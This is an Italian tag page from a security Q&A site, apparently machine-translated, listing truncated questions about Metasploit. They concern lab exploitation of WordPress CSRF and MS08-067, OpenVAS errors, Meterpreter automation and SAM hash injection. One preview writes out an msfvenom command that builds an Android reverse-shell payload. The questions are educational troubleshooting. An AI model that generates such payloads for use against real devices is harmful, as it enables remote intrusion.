Domande con tag 'metasploit'

domande con tag
1
risposta

Wordpress 4.0 CSRF Reimposta password

Sto lavorando a un progetto di facoltà. Devo replicare la vulnerabilità di Wordpress CSRF sul mio wordpress localhost. Sto cercando di farlo: link   Non sono riuscito a trovare alcun tutorial utile. Sto pensando di usare un modulo Metasploit s...
posta 28.05.2017 - 23:13
1
risposta

Errore Metasploit & Openvas (openvas_connect)

Sto usando Kali 4.3.0 e sto provando a eseguire il plugin openVAS in Metasploit. OpenVAS (versione 8.0) funziona correttamente sulla porta 9392, anche metasploit è ok. Questo è log of error: msf > openvas_connect admin admin 127.0.0.1 9392...
posta 16.05.2016 - 17:34
1
risposta

Risorse per determinare se Metasploit ha exploit per un dato CVE

Esistono risorse affidabili per scoprire se esista o meno un exploit Metasploit per un dato CVE? Ho trovato dettagli CVE obsoleto per quanto riguarda il mantenimento di queste informazioni aggiornate.     
posta 26.11.2013 - 17:06
1
risposta

problema del carico utile msfvenom

Questo è solo a scopo didattico! Sto provando a generare il payload di Android usando il generatore autonomo di payload msfconsole: msfvenom con il comando: msfvenom -p android/shell/reverse_tcp LHOST=192.168.100.4 LPORT=4444 R > an...
posta 01.11.2015 - 10:09
1
risposta

Lo sniffing dei pacchetti di Metasploit viene eseguito in modalità promiscua?

Sto facendo un'esercitazione con penna didattica e sto cercando di intercettare il traffico da una macchina Windows compromessa. Ho utilizzato i moduli di controllo post-exploitation sniffer e packetrecorder Meterpreter, ma finora hann...
posta 28.08.2013 - 02:43
1
risposta

Metasploit non rileva l'exploit python appena importato

Ho aggiunto OpenSSH 7.2p2 - Username Enumeration exploit a Metasploit, che è un exploit python. Ma dopo questo, non rileva questo exploit in tutti i modi in cui ho provato. L'ho messo sotto la directory /.msf4/modules/exploits/linux/re...
posta 30.10.2018 - 21:33
1
risposta

Esegue automaticamente i comandi meterpreter all'avvio della sessione

Esiste un modo per eseguire automaticamente uno o più comandi meterpreter, non appena il listener ottiene una connessione (cioè la sessione è stabilita con una destinazione)? Voglio eseguire il comando "hide_app_icon" non appena viene acquisita...
posta 03.03.2017 - 17:36
1
risposta

exploit di controllo di Armitage

Io sono con onestà non il tester di penetrazione più esperto, sto facendo un collocamento nel settore in cui posso migliorare le mie capacità. Sto usando Armitage in Kali Linux per verificare la presenza di vulnerabilità nella rete dell'azienda...
posta 16.03.2016 - 16:54
1
risposta

Iniettare l'hash nel file sam. È possibile?

Ho uno scenario molto insolito. Ho un laptop Windows 10 con una configurazione specifica. Su quella configurazione c'è un utente (utente locale, non utente dominio) che non conosco la sua password. Voglio migrare quell'utente ad un altro compute...
posta 24.06.2017 - 12:20
2
risposte

MS08_067 con Metasploit [chiuso]

Sto imparando come usare Metasploit. Sto usando VirtualBox per eseguire una VM con Kali Linux (192.168.56.101) e un'altra con Windows XP SP1 (192.168.56.103). Le due macchine virtuali possono eseguire il ping tra loro e Windows Firewall è disabi...
posta 29.12.2014 - 21:39